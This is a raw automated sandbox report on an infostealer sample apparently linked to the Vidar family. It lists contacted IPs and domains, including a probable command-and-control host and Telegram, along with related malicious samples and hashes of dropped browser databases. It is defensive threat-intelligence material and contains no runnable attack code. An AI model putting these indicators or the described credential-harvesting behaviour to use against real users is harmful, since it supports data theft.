                                                                                                                                                                                                                      http://anglebug.com/3624chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/5007chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://anglebug.com/3862chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://assets.msn.com/resolver/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000003.2009605110.00006C7800C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012516737.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2020378697.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019708088.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012045671.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007757048.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009388296.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
IP               Domain                                Country         ASN      ASN Name                       Malicious
23.200.88.31     unknown                               United States   16625    AKAMAI-ASUS                    false
23.57.90.152     unknown                               United States   35994    AKAMAI-ASUS                    false
116.203.12.114   sedone.online                         Germany         24940    HETZNER-ASDE                   false
172.217.19.225   googlehosted.l.googleusercontent.com  United States   15169    GOOGLEUS                       false
149.154.167.99   t.me                                  United Kingdom  62041    TELEGRAMRU                     false
142.250.181.68   www.google.com                        United States   15169    GOOGLEUS                       false
20.110.205.119   unknown                               United States   8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
204.79.197.219   unknown                               United States   8068     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
18.173.219.84    unknown                               United States   3        MIT-GATEWAYSUS                 false
172.64.41.3      chrome.cloudflare-dns.com             United States   13335    CLOUDFLARENETUS                false
23.57.90.146     unknown                               United States   35994    AKAMAI-ASUS                    false
239.255.255.250  unknown                               Reserved        unknown  unknown                        false
20.42.73.31      unknown                               United States   8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
IP
192.168.2.8
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1576056
Start date and time:2024-12-16 13:44:58 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:32
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:nB52P46OJD.exe
                                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                                  Original Sample Name:c6e90b3a98ecb4ab74a9aaf8155d1bc0.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@82/299@21/15
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  • Number of executed functions: 78
                                                                                                                                                                                                                                  • Number of non-executed functions: 298
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: nB52P46OJD.exe
| Time | Type | Description |
| 07:45:53 | API Interceptor | 1x Sleep call for process: nB52P46OJD.exe modified |
| 07:45:59 | API Interceptor | 7x Sleep call for process: Participating.com modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 23.57.90.152 | file.exe | malicious | Amadey, Stealc, Vidar | |
| | file.exe | malicious | Amadey, Stealc, Vidar | |
| | https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni | malicious | Unknown | |
| 116.203.12.114 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | |
| | T0x859fNfn.exe | malicious | Vidar | |
| 149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico |
| | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/ |
| | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217 |
| | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/ |
| | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl |
| | http://makkko.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegram.dog | malicious | Unknown | telegram.dog/ |
| | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot |
| | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| t.me | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 149.154.167.99 |
| | njrtdhadawt.exe | malicious | Stealc, Vidar | 149.154.167.99 |
| | T0x859fNfn.exe | malicious | Vidar | 149.154.167.99 |
| | file.exe | malicious | LummaC, Amadey, Cryptbot, Vidar, Xmrig | 149.154.167.99 |
| | https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa | malicious | Unknown | 104.26.10.61 |
| | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 149.154.167.99 |
| | lem.exe | malicious | Vidar | 149.154.167.99 |
| | Setup.msi | malicious | Vidar | 149.154.167.99 |
| | file.exe | malicious | PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar | 149.154.167.99 |
| | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99 |
| chrome.cloudflare-dns.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | 172.64.41.3 |
| | T0x859fNfn.exe | malicious | Vidar | 162.159.61.3 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.64.41.3 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.64.41.3 |
| | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 172.64.41.3 |
| | AyqwnIUrcz.exe | malicious | Unknown | 172.64.41.3 |
| | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 162.159.61.3 |
| | Uniswap Sniper Bot With GUI.exe | malicious | Unknown | 172.64.41.3 |
| | Uniswap Sniper Bot With GUI.exe | malicious | Unknown | 172.64.41.3 |
| | naukri-launcher 10.exe | malicious | Unknown | |
                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                            ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 94.245.104.56
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match, Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\479RQ1NOHDJM\RIMOH4lem.exe | malicious | Vidar
Setup.exe | malicious | Vidar
xoJxSAotVM.exe | malicious | Vidar
fim3BhyKXP.gif | malicious | Unknown
TMX.exe | malicious | Unknown
file.exe | malicious | Amadey, Vidar
lem.exe | malicious | Vidar
ljwIPDSwFi.exe | malicious | DarkGate, MailPassView, Vidar
jE4zclRJU2.exe | malicious | Vidar
5CG2133F5Y_2024-04-05_12_15_35.569.zip | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 10219
Entropy (8bit): 4.966520026409024
Encrypted: false
SSDEEP: 96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
MD5: 381138FA1B1C4C298AD2441898677ED6
SHA1: B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
SHA-256: D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
SHA-512: 095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 294912
Entropy (8bit): 0.08432026317203951
Encrypted: false
SSDEEP: 192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
MD5: C444D5B9503F9CCFA9750AB3D51848E9
SHA1: FFF755261E04C7502AF2F172DE3752D9458100FE
SHA-256: 66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
SHA-512: E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1468
Entropy (8bit): 5.0065780470180306
Encrypted: false
SSDEEP: 24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
MD5: E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
SHA1: A1120341BB4452FCA47EB5EA8FA62A08BFC48073
SHA-256: A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
SHA-512: 69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 2947
Entropy (8bit): 5.120077314818075
Encrypted: false
SSDEEP: 48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5: C7E301D9DD77A21C1CDBD73A63AF205C
SHA1: 715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256: 239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512: B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 8193
Entropy (8bit): 5.027484893998515
Encrypted: false
SSDEEP: 96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
MD5: 2D6ACF2AEC5E5349B16581C8AE23BF3E
SHA1: 0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
SHA-256: B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
SHA-512: 7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
Malicious: false
Preview: .<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,
Process: C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4814
                                                                                                                                                                                                                                                                Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                                                                MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                                                                SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                                                                SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                                                                SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3958094375125357
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:nQwlrNmQnc/vSpKll7DYMcCSG8JO8VFDYMcSzi:QcfITll4/jVG
                                                                                                                                                                                                                                                                MD5:CB5BF3CC261B4FE5AD758C20925373CD
                                                                                                                                                                                                                                                                SHA1:9EC0DE71E0263B7C0714043097DC2AE669C2F2BE
                                                                                                                                                                                                                                                                SHA-256:CEE51CA746542EEDE94535D76234D0D5F336EBB474AC70A577304C6F0651032E
                                                                                                                                                                                                                                                                SHA-512:852A02FE2981DAA552414D028D3F9689CF13B0082BC628F146171FC40BF4416C9E5623EA36693B42401346923CDDD703B2710A1C49C280E5A55334FB5AB72680
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3940876416121774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
                                                                                                                                                                                                                                                                MD5:B51CD8F4331276235DFA5BF1EAAF1A9E
                                                                                                                                                                                                                                                                SHA1:E8A9B579E4CDE21510D0C55B7A86417D7A72991D
                                                                                                                                                                                                                                                                SHA-256:7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
                                                                                                                                                                                                                                                                SHA-512:DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                Entropy (8bit):1.2650735324923974
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8QTQKC+CVumG:K0q+n0JC9ELyKOMq+8Q75
                                                                                                                                                                                                                                                                MD5:DCE8F8413E31D6E7FFCD9F1910B32275
                                                                                                                                                                                                                                                                SHA1:19CD5493E33F7159DE9BAAA24591021CDE15E965
                                                                                                                                                                                                                                                                SHA-256:FE11A9E09F87E00E92AAE60F9A4176E7D43F3A6FDE732C79772EAD5FF077594E
                                                                                                                                                                                                                                                                SHA-512:4342E1A96B4778091BE412ABE8221042C5E0FC3282A222078CA4E92102C0ED9058310D98DCBFC503A54A527BDA7EAA6C22D532F1290BE73A3C4514B6DAF4EF5F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3940876416121774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
                                                                                                                                                                                                                                                                MD5:B51CD8F4331276235DFA5BF1EAAF1A9E
                                                                                                                                                                                                                                                                SHA1:E8A9B579E4CDE21510D0C55B7A86417D7A72991D
                                                                                                                                                                                                                                                                SHA-256:7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
                                                                                                                                                                                                                                                                SHA-512:DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9976
                                                                                                                                                                                                                                                                Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
